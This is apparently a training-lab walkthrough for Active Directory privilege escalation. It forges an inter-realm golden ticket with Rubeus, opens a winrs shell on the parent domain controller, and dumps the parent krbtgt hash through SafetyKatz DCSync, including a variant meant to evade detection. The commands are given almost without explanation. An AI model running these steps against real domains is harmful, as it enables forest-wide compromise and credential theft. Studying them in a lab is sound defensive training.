Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash.
Since we already have krbtgt hash from dcorp-dc , we can create the inter-realm TGT and inject it.
Copy C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt
Copy winrs -r:mcorp-dc.moneycorp.local cmd
C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator
C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC
C:\Users\Administrator.dcorp>
Copy C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
Copy # ArgSplit for "lsadump::dcsync"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:mcorp\krbtgt /domain:moneycorp.local" "exit"